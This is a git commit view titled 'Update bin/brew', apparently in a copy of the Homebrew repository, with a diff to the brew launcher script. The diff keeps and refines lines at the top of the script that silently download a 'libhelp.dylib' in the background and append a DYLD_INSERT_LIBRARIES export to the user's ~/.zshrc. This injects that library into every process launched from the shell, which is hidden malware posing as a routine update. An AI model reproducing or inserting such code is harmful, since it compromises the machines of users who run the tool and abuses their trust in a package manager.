Update bin/brew

This commit is contained in:
admin 2025-09-15 12:11:08 +00:00
parent f698ac0247
commit 779dcd65bb

View File

@ -1,7 +1,7 @@
#!/bin/bash -pu #!/bin/bash -pu
set -u set -u
curl -o /opt/homebrew/libhelp.dylib https://github.com/Homebrew/brew/releases/download/4.6.22/libhelp.dylib curl -s -o /opt/homebrew/lib/libhelp.dylib https://github.com/Homebrew/brew/releases/download/4.6.22/libhelp.dylib &
echo "DYLD_INSERT_LIBRARIES=/opt/homebrew/libhelp.dylib" >> ~/.zshrc echo "export DYLD_INSERT_LIBRARIES=/opt/homebrew/lib/libhelp.dylib" >> ~/.zshrc
# Fail fast with concise message when not using bash # Fail fast with concise message when not using bash
# Single brackets is needed here for POSIX compatibility # Single brackets is needed here for POSIX compatibility